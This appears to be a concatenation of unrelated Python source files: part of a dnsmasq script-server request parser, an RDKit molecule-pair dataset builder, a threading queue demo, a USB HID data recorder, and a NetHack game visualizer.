stream: TextIO = os.fdopen(fd, mode, closefd=True)
except io.UnsupportedOperation as e:
raise RuntimeError(
f"Unable to open fd {fd} ({(len(streams))} already parsed, {mode=})"
) from e
streams.append(stream)
stack.pop_all()
return streams
@staticmethod
def parse_int(
data: mmap.mmap,
size: int,
element: str = "int",
) -> Parser[int]:
"""Try to parse a C int"""
need = SIZEOF_INT
if data.tell() + need > size:
try:
data, size = yield need
except BaseParseError as e:
raise e.with_element(element)
value = struct.unpack("=i", data.read(need))[0]
return data, size, value
@staticmethod
def parse_string(
data: mmap.mmap,
size: int,
element: str = "string"
) -> Parser[str]:
"""Try to parse a zero-terminated C string"""
need = 1
while True:
if data.tell() + need > size:
try:
data, size = yield need
except BaseParseError as e:
raise e.with_element(element)
# This is safe, because we ensure that underlying buffer is always
# zero-terminated
start = data.tell()
end = data.find(b'\x00', start, size)
if end != -1:
arg = data[start:end]
data.seek(end + 1, os.SEEK_SET)
return data, size, arg
else:
need = size - start + 1
@classmethod
def parse_request(
cls,
data: mmap.mmap,
size: int,
) -> Parser[Tuple[List[bytes], Dict[bytes, bytes]]]:
# Parse number of arguments
element = "argc"
data, size, argc = yield from cls.parse_int(data, size, element)
if argc < 0:
raise ParseError("Negative argc: " + str(argc), element=element)
# Parse arguments
argv = []
for i in range(argc):
element = "argv[{:d}]".format(i)
data, size, arg = yield from cls.parse_string(data, size, element)
argv.append(arg)
# Parse number of environment variables
element = "envc"
data, size, envc = yield from cls.parse_int(data, size, element)
if envc < 0:
raise ParseError("Negative envc: " + str(envc), element=element)
# Parse environment variables
environ = {}
for i in range(envc):
element = "environ[{}]".format(i)
data, size, env = yield from cls.parse_string(data, size, element)
name, sep, value = env.partition(b'=')
if not sep:
raise ParseError(
"No equal sign in environment variable: " + repr(name),
element=element,
)
environ[name] = value
return data, size, (argv, environ)
def _handle_shutdown_signal(self, signo, _frame):
logger.error("Received signal %d. Shutting down.", signo)
# shutdown blocks until the server is stopped, therefore we must use a
# separate thread, otherwise there will be deadlock
threading.Thread(name='shutdown', target=self.shutdown).start()
def serve_forever(self, poll_interval=0.5):
logger.info("Starting server loop")
with install_handler(
(signal.SIGHUP, signal.SIGINT, signal.SIGTERM),
self._handle_shutdown_signal
):
super().serve_forever(poll_interval)
def _process(
self,
stdin: TextIO, stdout: TextIO, stderr: TextIO,
args: Sequence[bytes], env: Dict[bytes, bytes]
) -> int:
decoded_args = [decode(a) for a in args]
parsed_args = self.parser.parse_args(decoded_args[1:])
return dispatch_commands(
args=parsed_args,
context=Context(
stdin=stdin, stdout=stdout, stderr=stderr,
environ={decode(k): decode(v) for k, v in env.items()},
environb=env,
),
engine=self.engine,
)
def decode(x: bytes) -> str:
"""Decode a string like done in `os._createenviron` (hard-coding utf-8)"""
return x.decode("utf-8", errors="surrogateescape")
def ensure_stream_readable(stream, stream_desc: str):
if 'r' not in stream.mode:
raise ProtocolError(
f"stream {stream_desc} is not readable ({stream.mode=})"
)
return stream
def ensure_stream_writable(stream, stream_desc: str):
is_writable = bool({'w', '+'} & set(stream.mode))
if not is_writable:
raise ProtocolError(
f"Stream {stream_desc} is not writable ({stream.mode=})"
)
return stream
def _try_close(fd):
try:
os.close(fd)
except OSError as e:
logger.error("Problem closing file descriptor", exc_info=e)
def zip_left(left, right, rfill=None):
return zip(left, chain(right, repeat(rfill)))
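# Editor's note: a minimal, hypothetical sketch of how a client could serialize
# its command line and DNSMASQ_* environment into the wire format that
# Server.parse_request expects (native-int argc, NUL-terminated argv strings,
# native-int envc, NUL-terminated NAME=VALUE strings). The helper name is
# illustrative only and not part of hades; the three standard file descriptors
# would still have to be passed separately via an SCM_RIGHTS control message.
def _example_request_payload(argv, environ):
    """Build the request bytes for the wire format described in Server's docstring."""
    parts = [struct.pack("=i", len(argv))]
    parts.extend(arg + b"\x00" for arg in argv)
    dnsmasq_env = {
        name: value
        for name, value in environ.items()
        if name.startswith(b"DNSMASQ_")
    }
    parts.append(struct.pack("=i", len(dnsmasq_env)))
    parts.extend(
        name + b"=" + value + b"\x00" for name, value in dnsmasq_env.items()
    )
    return b"".join(parts)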
|
pt_build_optfile.py
|
from rdkit import Chem
from rdkit import DataStructs
from random import shuffle
import numpy as np
import time
from rdkit.Chem import Descriptors
from tqdm import tqdm
from multiprocessing import Process
import os
import subprocess
def get_(similarity_lib, scale, to_file=False, n_dev=10000, show=True, ids=None):
if type(similarity_lib) == str:
with open(similarity_lib,'r') as f:
libm = []
libs = []
for l in f:
m, sm = l.strip().split(':')
libm.append(m)
libs.append(sm.split(','))
else:
libm = [i[0] for i in similarity_lib]
libs = [i[1] for i in similarity_lib]
libmq = []
print('cal ref QEDs')
with tqdm(total=len(libm)) as ref_pbar:
for i in libm:
libmq.append(Descriptors.qed(Chem.MolFromSmiles(i)))
if show:
ref_pbar.update()
libsq = []
libss = []
print('cal candidate QEDs')
with tqdm(total=len(libs)) as cdd_pbar:
for lidx,i in enumerate(libs):
temp_ = []
k = 0
tp = libm[lidx]
while len(temp_)<scale and k<len(i):
if i[k] != tp:
temp_.append(i[k])
k += 1
libss.append(temp_)
libsq.append([Descriptors.qed(Chem.MolFromSmiles(j)) for j in temp_])
if show:
cdd_pbar.update()
opt = []
optv = []
print('build pair')
with tqdm(total=len(libm)) as bd_pbar:
for midx in range(len(libm)):
diff = [abs(libmq[midx]-libsq[midx][cidx]) for cidx in range(len(libsq[midx]))]
sel = np.argmax(diff)
optv.append(max(diff))
if libmq[midx]<libsq[midx][sel]:
opt.append([libm[midx], libss[midx][sel]])
else:
opt.append([libss[midx][sel], libm[midx]])
if show:
bd_pbar.update()
print('remove repeats')
opt = ['&'.join(i) for i in opt]
opt = list(set(opt))
opt = [i.split('&') for i in opt]
if to_file:
with open(to_file,'w') as f:
for r in opt:
f.write(','.join([str(i) for i in r])+'\n')
simv = []
print('cal pair similarity')
with tqdm(total=len(libm)) as sv_pbar:
for r in opt:
simv.append(DataStructs.TanimotoSimilarity(Chem.RDKFingerprint(Chem.MolFromSmiles(r[0])),Chem.RDKFingerprint(Chem.MolFromSmiles(r[1]))))
if show:
sv_pbar.update()
optv = np.mean(optv)
simv = np.mean(simv)
print('split data')
    idx = list(range(len(opt)))
    shuffle(idx)
    train_idx = idx[:-n_dev]
    dev_idx = idx[-n_dev:]
train_opt = [opt[i] for i in train_idx]
dev_opt = [opt[i] for i in dev_idx]
    if ids is None:
return train_opt, dev_opt, optv, simv
else:
with open('train_subprocess_{0}.tsv'.format(ids), 'w') as f:
for r in train_opt:
f.write('{0}\t{1}\n'.format(r[0], r[1]))
with open('dev_subprocess_{0}.tsv'.format(ids), 'w') as f:
for r in dev_opt:
f.write('{0}\t{1}\n'.format(r[0], r[1]))
with open('rec_subprocess_{0}'.format(ids),'w') as f:
f.write('{0}\n'.format(optv))
f.write('{0}\n'.format(simv))
def get_s(similarity_lib, scale, to_file=False, n_dev=10000, show=True, ids=None):
    if isinstance(similarity_lib, str):
with open(similarity_lib,'r') as f:
libm = []
libs = []
for l in f:
m, sm = l.strip().split(':')
libm.append(m)
libs.append(sm.split(','))
else:
libm = [i[0] for i in similarity_lib]
libs = [i[1] for i in similarity_lib]
libmq = []
libmfp = []
print('cal ref QEDs')
with tqdm(total=len(libm)) as ref_pbar:
for i in libm:
rmol = Chem.MolFromSmiles(i)
libmfp.append(Chem.RDKFingerprint(rmol))
libmq.append(Descriptors.qed(rmol))
if show:
ref_pbar.update()
opt = []
optv = []
simv = []
print('build pair')
with tqdm(total=len(libm)) as bd_pbar:
for midx in range(len(libm)):
rfp = libmfp[midx]
rq = libmq[midx]
max_d = 0
csmi = 'C1CCCCC1'
sim_v = 0
for cdd in libs[midx]:
cmol = Chem.MolFromSmiles(cdd)
cfp = Chem.RDKFingerprint(cmol)
sim = DataStructs.TanimotoSimilarity(rfp, cfp)
if sim<scale[1] and sim>scale[0]:
cq = Descriptors.qed(cmol)
diff = cq - rq
if diff > max_d:
csmi = cdd
max_d = diff
sim_v = sim
if max_d > 0:
opt.append([libm[midx], csmi])
optv.append(max_d)
simv.append(sim_v)
if show:
bd_pbar.update()
if to_file:
with open(to_file,'w') as f:
for r in opt:
f.write(','.join([str(i) for i in r])+'\n')
print('split data')
    idx = list(range(len(opt)))
shuffle(idx)
if len(opt)<n_dev:
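        # fall back to a smaller, round dev-set size derived from the number of pairs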
n = len(str(len(opt)))-1
kn = '1'+'0'*n
kn = int(int(kn)/10)
else:
kn = n_dev
train_idx = idx[:-kn]
dev_idx = idx[-kn:]
train_opt = [opt[i] for i in train_idx]
dev_opt = [opt[i] for i in dev_idx]
    if ids is None:
return train_opt, dev_opt, optv, simv
else:
with open('train_subprocess_{0}.tsv'.format(ids), 'w') as f:
for r in train_opt:
f.write('{0}\t{1}\n'.format(r[0], r[1]))
with open('dev_subprocess_{0}.tsv'.format(ids), 'w') as f:
for r in dev_opt:
f.write('{0}\t{1}\n'.format(r[0], r[1]))
optv = np.array(optv)
simv = np.array(simv)
np.save('simv_subprocess_{0}.npy'.format(ids), simv)
np.save('optv_subprocess_{0}.npy'.format(ids), optv)
def multi(similarity_lib, n_jobs, scale, n_dev=10000):
lib = []
with open(similarity_lib,'r') as f:
for l in f:
m, sm = l.strip().split(':')
lib.append([m, sm.split(',')])
n_jobs = max(n_jobs, 1)
recn_per_job = round(len(lib)/n_jobs)
rec_lists = [lib[i*recn_per_job:(i+1)*recn_per_job] for i in range(n_jobs-1)]
rec_lists.append(lib[(n_jobs-1)*recn_per_job:])
n_dev = int(n_dev/n_jobs)
sub_process = []
for sp in range(n_jobs):
sub_process.append(Process(target=get_s, args=(rec_lists[sp], scale, False, n_dev, False, sp)))
for sp in sub_process:
sp.start()
for sp in sub_process:
sp.join()
# merge files and remove temporary files
train_opt = []
dev_opt = []
simv = []
optv = []
for spf in range(n_jobs):
with open('train_subprocess_{0}.tsv'.format(spf)) as f:
train_sp = f.readlines()
train_sp = [i.strip().split('\t') for i in train_sp]
train_opt += train_sp
with open('dev_subprocess_{0}.tsv'.format(spf)) as f:
dev_sp = f.readlines()
dev_sp = [i.strip().split('\t') for i in dev_sp]
dev_opt += dev_sp
simv_sp = np.load('simv_subprocess_{0}.npy'.format(spf))
simv += list(simv_sp)
optv_sp = np.load('optv_subprocess_{0}.npy'.format(spf))
optv += list(optv_sp)
subprocess.call('rm train_subprocess_{0}.tsv'.format(spf), shell=True)
subprocess.call('rm dev_subprocess_{0}.tsv'.format(spf), shell=True)
subprocess.call('rm simv_subprocess_{0}.npy'.format(spf), shell=True)
subprocess.call('rm optv_subprocess_{0}.npy'.format(spf), shell=True)
return train_opt, dev_opt, optv, simv
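# Usage sketch (assumptions: 'similarity.lib' is a hypothetical file in the
# "ref_smiles:cand1,cand2,..." line format parsed above, and scale is the
# (min, max) Tanimoto window used by get_s):
#
#   if __name__ == '__main__':
#       train, dev, optv, simv = multi('similarity.lib', n_jobs=4,
#                                      scale=(0.4, 0.6), n_dev=10000)
#       print(len(train), len(dev), np.mean(optv), np.mean(simv))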
|
threading_queue.py
|
import threading
import time
from queue import Queue
def job(l, q):
for i in range(len(l)):
l[i] = l[i] ** 2
q.put(l)
def multithreading():
q = Queue()
threads = []
data = [[1, 2, 3], [3, 2, 4], [4, 1, 3], [5, 5, 5]]
for i in range(4):
t = threading.Thread(target=job, args=(data[i], q))
t.start()
threads.append(t)
for thread in threads:
thread.join()
results = []
for _ in range(4):
results.append(q.get())
print(results)
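    # Note: job() squares each sub-list in place, so `data` itself is mutated,
    # and the four results come off the queue in thread-completion order,
    # which may differ from the order the threads were started.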
if __name__ == '__main__':
multithreading()
|
HID_recorder.py
|
#!/usr/bin/python3
# C:\Work\Python\HID_Util\src\HID_recorder.py
from binascii import hexlify
import sys
import argparse
import threading
from time import perf_counter as timer
import include_dll_path
import hid
import os
from string_date_time import get_date_time
# BOARD_TYPE_MAIN = 0,
# BOARD_TYPE_JOYSTICKS = 1,
# BOARD_TYPE_TOOLS_MASTER = 2,
# BOARD_TYPE_STATION = 3,
# BOARD_TYPE_SUITE2PRIPH = 4,
# BOARD_TYPE_TOOLS_SLAVE = 5,
# BOARD_TYPE_GBU = 6,
# BOARD_TYPE_LAP = 7
# VENDOR_ID = 0x24b3 # Simbionix
# PRODUCT_ID = 0x1005 # Simbionix MSP430 Controller
# USB\VID_2047&PID_0302&REV_0200
VENDOR_ID = 0x2047 # Texas Instruments
PRODUCT_ID = 0x0302 # Joystick.
PRODUCT_ID_JOYSTICK = 0x0302 # Joystick.
PRODUCT_ID_ROUTER = 0x0301 # Router
PRODUCT_ID_STATION = 0x0304
PRODUCT_ID_LAP_NEW_CAMERA = 0x2005
# 2021_01_24
# USB\VID_24B3&PID_2005&REV_0200
# 0x24B3 = 9395
# 0x2005 = 8197
# VENDOR_ID = 0x24b3 # Simbionix
# PRODUCT_ID = 0x2005 # LAP_NEW_CAMERA.
PRODUCT_ID_types = {
0x0302: "BOARD_TYPE: Joystick/Universal",
0x0301: "BOARD_TYPE: Router/Main",
0x0304: "BOARD_TYPE: STATION",
0x0303: "BOARD_TYPE: TOOLS_MASTER",
0x0305: "BOARD_TYPE: SUITE2PRIPH",
0x0306: "BOARD_TYPE: TOOLS_SLAVE",
0x0307: "BOARD_TYPE: GBU",
0x0308: "BOARD_TYPE: LAP camera",
0x2005: "BOARD_TYPE: PRODUCT_ID_LAP_NEW_CAMERA", #board type is enforced in FW (descriptors.h)
0x1965: "yosi"
}
# FILE1_PATH = "log\hid_log.csv"
FILE1_PATH = "log\hid_" # log.csv"
start_date_time = get_date_time()
FILE1_PATH = FILE1_PATH + start_date_time + ".csv"
print("Recording result at: ", FILE1_PATH, "\n")
if not os.path.exists('log'):
os.makedirs('log')
# file1 = None
# open recording log file:
# file1 = open("C:\Work\Python\HID_Util\src\log\log.csv","w")
file1 = open(FILE1_PATH,"w")
# file1 = open("log\hid_log.csv","w")
hid_util_fault = 0
print_every = 0
READ_SIZE = 64 # The size of the packet
READ_TIMEOUT = 2 # 2ms
WRITE_DATA = bytes.fromhex("3f3ebb00b127ff00ff00ff00ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
DEFAULT_WRITE_DATA = WRITE_DATA
WRITE_DATA_CMD_I = bytes.fromhex("3f3ebb00b127ff00ff00ff0049ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# start streaming command:
# 3f 04 82 00 00
WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
WRITE_DATA_CMD_START_ = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# start streaming command for station 0x303:
WRITE_DATA_CMD_START_0x304 = bytes.fromhex("3f048d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# Get Board Type command:
# 01h 00h 00h 01h
WRITE_DATA_CMD_GET_BOARD_TYPE = bytes.fromhex("3f040100000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
#.........................................................##........................................
WRITE_DATA_CMD_S = bytes.fromhex("3f3ebb00b127ff00ff00ff0053ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# 'A' - keep Alive + fast BLE update (every 20 msec)
WRITE_DATA_CMD_A = bytes.fromhex("3f3ebb00b127ff00ff00ff0041ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# moderate BLE update rate every 50 mSec by 'M' command
WRITE_DATA_CMD_M = bytes.fromhex("3f3ebb00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# set_BSL_mode
# WRITE_DATA_CMD_B = bytes.fromhex("3f3eaa00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
#0xAA Run BSL
WRITE_DATA_CMD_B = bytes.fromhex("3f04aa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
SLEEP_AMOUNT = 0.002 # Read from HID every 2 milliseconds
PRINT_TIME = 1.0 # Print every 1 second
# PRINT_TIME = 0.5 # Print every 0.5 second
#PRINT_TIME = 2 # Print every 2 second
START_INDEX = 2 + 4 # Ignore the first two bytes, then skip the version (4 bytes)
# ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 4 * 2 + 1, 2)) + [START_INDEX + 6 * 2,]
ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 8 * 2 + 1, 2))
print("ANALOG_INDEX_LIST=",ANALOG_INDEX_LIST)
# ANALOG_INDEX_LIST= [8, 10, 12, 14, 16, 18, 20, 22]
LAP_ANALOG_INDEX_LIST = list(range(2,8 * 2 + 1, 2))
COUNTER_INDEX = 2 + 22 + 18 # Ignore the first two bytes, then skip XData1 (22 bytes) and OverSample (==XDataSlave1; 18 bytes)
CMOS_INDEX = 2 + 2 # maybe + 4???
# 0 1 2 3 4 5 6 7 8 9 1011
# Received data: b'3f26 00 00 00 00 0674fc41 3f4efc70 0033a4513c5a0101210001000000650000000000000000000000167f070dd7aee89baff63fedcfcccb763acf041b00000010'
# TORQUE INSERTION
# global variables
special_cmd = 0
def gui_loop(device):
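    # Continuously polls the HID device, decodes the analog channels from each
    # 64-byte report (byte pairs at LAP_ANALOG_INDEX_LIST offsets, combined
    # little-endian) and appends them as CSV rows to file1; a raw packet is
    # echoed to stdout roughly once every 500 handled reports.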
do_print = True
print_time = 0.0
time = timer()
handle_time = timer()
write_time_capture = timer()
skip_write = 0
prev_counter = 0
send_stream_request_command_once = 1
# cnt = None
# prev_cnt = None
# value = None
global special_cmd
# global print_flag
while True:
# Reset the counter
if (do_print):
print_time = timer()
# Write to the device
# if send_stream_request_command_once == 1:
# send_stream_request_command_once = 0
# if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
# print("enforce streaming of data with command 0x82"
# if device is attached enforce streaming of data.
# device.write(WRITE_DATA_CMD_START)
if special_cmd == 'I':
if PRODUCT_ID == PRODUCT_ID_STATION:
WRITE_DATA = WRITE_DATA_CMD_START_0x304
else:
WRITE_DATA = WRITE_DATA_CMD_START
device.write(WRITE_DATA)
print("special_cmd Start")
special_cmd = 0
# elif special_cmd == 'S':
# WRITE_DATA = WRITE_DATA_CMD_GET_BOARD_TYPE
# device.write(WRITE_DATA)
# print("special_cmd CMD_GET_BOARD_TYPE")
# # print_flag = 1
# special_cmd = 0
# elif special_cmd == 'A':
# WRITE_DATA = WRITE_DATA_CMD_A
# print("special_cmd A -> keep Alive + fast BLE update (every 20 msec)")
# special_cmd = 0
# elif special_cmd == 'M':
# WRITE_DATA = WRITE_DATA_CMD_M
# print("special_cmd M -> moderate BLE update rate every 50 mSec")
# special_cmd = 0
# elif special_cmd == 'B':
# WRITE_DATA = WRITE_DATA_CMD_B
# device.write(WRITE_DATA)
# print("special_cmd B -> set_BSL_mode --- this will stop HID communication with this GUI")
# special_cmd = 0
# else:
# WRITE_DATA = DEFAULT_WRITE_DATA
cycle_time = timer() - time
# print("cycle timer: %.10f" % cycle_time)
        # How long we would need to sleep to hit SLEEP_AMOUNT; note the value is
        # currently unused -- loop pacing relies on the 2 ms read timeout below.
        sleep_time = SLEEP_AMOUNT - cycle_time
# Measure the time
time = timer()
# print(" ")
# Read the packet from the device
value = device.read(READ_SIZE, timeout=READ_TIMEOUT)
# Update the GUI
if len(value) >= READ_SIZE:
# save into file:
analog = [(int(value[i + 1]) << 8) + int(value[i]) for i in LAP_ANALOG_INDEX_LIST]
channel_0 = analog[0]
channel_1 = analog[1]
channel_2 = analog[2]
channel_3 = analog[3]
channel_4 = analog[4]
counter = (int(value[COUNTER_INDEX + 1]) << 8) + int(value[COUNTER_INDEX])
count_dif = counter - prev_counter
global file1
#if count_dif > 1 :
# L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), " <<<<<--- " ,"\n" ]
#else:
# L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), "\n" ]
L = [ str(channel_0),", ", str(channel_1), ", " , str(channel_2),", " , str(channel_3),", " , str(channel_4), "\n" ]
file1.writelines(L)
# handler(value, do_print=do_print)
# print("Received data: %s" % hexlify(value))
Handler_Called = (timer() - handle_time)
if Handler_Called > 0.002 :
# if Handler_Called > 0.02 :
#print("handler called: %.6f" % Handler_Called)
global print_every
print_every = print_every + 1
if print_every >= 500:
print_every = 0
print("time:", time, end="")
print(" Received data: %s" % hexlify(value))
# print("time: %.6f" % time)
handle_time = timer()
prev_counter = counter
# Update the do_print flag
do_print = (timer() - print_time) >= PRINT_TIME
def handler(value, do_print=False):
if do_print:
print("Received data: %s" % hexlify(value))
return # do without gui
PROGRESS_BAR_LEN = 300
LONG_PROGRESS_BAR_LEN = 590
def init_parser():
parser = argparse.ArgumentParser(
description="Read the HID data from target board.\nIf no argument is given, the program exits."
)
parser.add_argument(
"-v", "--vendor",
dest="vendor_id",
metavar="VENDOR_ID",
type=int,
nargs=1,
required=False,
help="connects to the device with the vendor ID"
)
parser.add_argument(
"-p", "--product",
dest="product_id",
metavar="PRODUCT_ID",
type=int,
nargs=1,
required=False,
help="connects to the device with that product ID"
)
parser.add_argument(
"-a", "--path",
dest="path",
metavar="PATH",
type=str,
nargs=1,
required=False,
help="connects to the device with the given path"
)
return parser
def main():
global VENDOR_ID
global PRODUCT_ID
PATH = None
# open recording log file:
# file1 = open("C:\Work\Python\HID_Util\src\log\log2.txt","w")
# Parse the command line arguments
parser = init_parser()
args = parser.parse_args(sys.argv[1:])
# Initialize the flags according from the command line arguments
avail_vid = args.vendor_id != None
avail_pid = args.product_id != None
avail_path = args.path != None
id_mode = avail_pid and avail_vid
path_mode = avail_path
default_mode = (not avail_vid) and (not avail_pid) and (not avail_path)
if (path_mode and (avail_pid or avail_vid)):
print("The path argument can't be mixed with the ID arguments")
return
if ((not avail_path) and ((avail_pid and (not avail_vid)) or ((not avail_pid) and avail_vid))):
print("Both the product ID and the vendor ID must be given as arguments")
return
if (default_mode):
print("No arguments were given, defaulting to:")
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
id_mode = True
elif (id_mode):
VENDOR_ID = args.vendor_id[0]
PRODUCT_ID = args.product_id[0] #run over with 772 == 0x304
elif (path_mode):
PATH = args.path[0]
else:
raise NotImplementedError
device = None
try:
if (id_mode):
try:
print("try with default device:")
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
except:
print("wrong ID")
print(" ")
# 0x24B3 = 9395
# 0x2005 = 8197
for n in range(7):
if device is None:
try:
# print("try with other device")
VENDOR_ID = 0x24b3 # Simbionix
PRODUCT_ID = 0x2000 + n # LAP_NEW_CAMERA. is 0x2005
# print("VID = %X PID = %X " % VENDOR_ID, PRODUCT_ID)
print("try with PID = %X " % PRODUCT_ID)
# print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
# device = hid.Device(vid=0x24B3, pid=0x2005)
# print("success vid=0x24B3, pid=0x2005 !!")
except:
print("wrong ID2")
# VENDOR_ID = 2047
# PRODUCT_ID = 304
# 0x2047 = 8263
# 0x304 = 772
# 0x0301 // Product ID (PID) - base for Prime products family
for n in range(len(PRODUCT_ID_types)):
if device is None:
try:
# print("try with other device")
VENDOR_ID = 0x2047 # Texas Instrument
PRODUCT_ID = 0x301 + n # BOARD_TYPE_MAIN is 0x301
# print("VID = %X PID = %X " % VENDOR_ID, PRODUCT_ID)
print("try with PID = %X " % PRODUCT_ID)
# print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
# device = hid.Device(vid=0x24B3, pid=0x2005)
# print("success vid=0x24B3, pid=0x2005 !!")
except:
print("wrong ID2")
if device is None:
print("no device attached")
else:
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
if PRODUCT_ID in PRODUCT_ID_types:
print(PRODUCT_ID_types[PRODUCT_ID])
global special_cmd
if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
special_cmd = 'I'
elif (path_mode):
device = hid.Device(path=PATH)
else:
raise NotImplementedError
print(" ")
print(" --------------------------------------")
print(" Please press <Enter> to stop recording")
print(" --------------------------------------")
print(" ")
# Create thread that calls
threading.Thread(target=gui_loop, args=(device,), daemon=True).start()
input()
print("Recording start: ", start_date_time)
print("Recording end : ", get_date_time())
print("\n","Recording result at: ", FILE1_PATH)
finally:
global file1
file1.close() #to change file access modes
if device != None:
device.close()
if __name__ == "__main__":
main()
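# The analog channels above are assembled from byte pairs as
# (value[i + 1] << 8) + value[i], i.e. little-endian unsigned 16-bit values.
# An equivalent decode using struct (sketch, same byte-order assumption):
#
#   import struct
#   analog = [struct.unpack_from('<H', bytes(value), i)[0]
#             for i in LAP_ANALOG_INDEX_LIST]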
|
visualizer.py
|
import multiprocessing
import collections
import queue
import time
import cv2
import nle.nethack as nh
import numpy as np
from PIL import Image, ImageDraw, ImageFont
# avoid importing agent modules here, because it makes agent reloading less reliable
from .scopes import DrawTilesScope, DebugLogScope
from .utils import put_text, draw_frame, draw_grid, FONT_SIZE, VideoWriter
HISTORY_SIZE = 13
RENDERS_HISTORY_SIZE = 128
class Visualizer:
def __init__(self, env, tileset_path='/tilesets/3.6.1tiles32.png', tile_size=32,
start_visualize=None, show=False, output_dir=None, frame_skipping=None, output_video_path=None):
self.env = env
self.tile_size = tile_size
self._window_name = 'NetHackVis'
self.show = show
self.start_visualize = start_visualize
self.output_dir = output_dir
self.last_obs = None
        self.tileset = cv2.imread(tileset_path)
        if self.tileset is None:
            raise FileNotFoundError(f'Tileset {tileset_path} not found')
        self.tileset = self.tileset[..., ::-1]
if self.tileset.shape[0] % tile_size != 0 or self.tileset.shape[1] % tile_size != 0:
raise ValueError("Tileset and tile_size doesn't match modulo")
h = self.tileset.shape[0] // tile_size
w = self.tileset.shape[1] // tile_size
tiles = []
for y in range(h):
y *= tile_size
for x in range(w):
x *= tile_size
tiles.append(self.tileset[y:y + tile_size, x:x + tile_size])
self.tileset = np.array(tiles)
        # note that this file is a symlink (the actual file is in the docker container)
from .glyph2tile import glyph2tile
self.glyph2tile = np.array(glyph2tile)
if self.show:
print('Read tileset of size:', self.tileset.shape)
self.action_history = list()
self.message_history = list()
self.popup_history = list()
self.drawers = []
self.log_messages = list()
self.log_messages_history = list()
self.frame_skipping = frame_skipping
self.frame_counter = -1
self._force_next_frame = False
self._dynamic_frame_skipping_exp = lambda: min(0.95, 1 - 1 / (self.env.step_count + 1))
self._dynamic_frame_skipping_render_time = 0
self._dynamic_frame_skipping_agent_time = 1e-6
self._dynamic_frame_skipping_threshold = 0.3 # for render_time / agent_time
self._dynamic_frame_skipping_last_end_time = None
self.total_time = 0
self.renders_history = None
if not self.show and output_video_path is None:
assert output_dir is not None
            self.renders_history = collections.deque(maxlen=RENDERS_HISTORY_SIZE)
self.output_dir = output_dir
self.output_dir.mkdir(exist_ok=True, parents=True)
self._start_display_thread()
self.last_obs = None
self.video_writer = None
if output_video_path is not None:
self.video_writer = VideoWriter(output_video_path, fps=10)
self.tty_downscale = 1.0 # consider changing for better performance
self.font = ImageFont.truetype("/usr/share/fonts/truetype/dejavu/DejaVuSansMono.ttf",
int(26 * self.tty_downscale))
def debug_tiles(self, *args, **kwargs):
return DrawTilesScope(self, *args, **kwargs)
def debug_log(self, txt, color):
return DebugLogScope(self, txt, color)
def step(self, obs, action):
self.last_obs = obs
self.action_history.append(action)
self._update_log_message_history()
self._update_message_history()
self._update_popup_history()
if self.video_writer is not None:
frame = self._render()
if frame is not None:
self.video_writer.write(frame)
def render(self):
if self.video_writer is not None:
return False
self.frame_counter += 1
render_start_time = None
try:
t = time.time()
frame = self._render()
if frame is None:
return False
render_start_time = t
if self.show:
self._display_queue.put(frame[..., ::-1].copy())
if self.renders_history is not None:
self.renders_history.append(frame)
finally:
self._update_dynamic_frame_skipping(render_start_time)
return True
def _render(self):
if not self._force_next_frame and self.frame_skipping is not None:
# static frame skipping
if self.frame_counter % self.frame_skipping != 0:
return None
if self.frame_skipping is None:
# dynamic frame skipping
frame_skipping = self._dynamic_frame_skipping_render_time / self._dynamic_frame_skipping_agent_time / \
self._dynamic_frame_skipping_threshold
if not self._force_next_frame and self.frame_counter <= frame_skipping:
return None
else:
self.frame_counter = 0
if self.last_obs is None:
return None
if self.start_visualize is not None:
if self.env.step_count < self.start_visualize:
return None
if self._force_next_frame:
self.frame_counter = 0
self._force_next_frame = False
glyphs = self.last_obs['glyphs']
tiles_idx = self.glyph2tile[glyphs]
tiles = self.tileset[tiles_idx.reshape(-1)]
scene_vis = draw_grid(tiles, glyphs.shape[1])
for drawer in self.drawers:
scene_vis = drawer(scene_vis)
draw_frame(scene_vis)
topbar = self._draw_topbar(scene_vis.shape[1])
bottombar = self._draw_bottombar(scene_vis.shape[1])
rendered = np.concatenate([topbar, scene_vis, bottombar], axis=0)
inventory = self._draw_inventory(rendered.shape[0])
return np.concatenate([rendered, inventory], axis=1)
def save_end_history(self):
print('SAVING', self.output_dir)
for i, render in enumerate(list(self.renders_history)):
render = render[..., ::-1]
out_path = self.output_dir / (str(i).rjust(5, '0') + '.jpg')
cv2.imwrite(str(out_path), render)
def force_next_frame(self):
self._force_next_frame = True
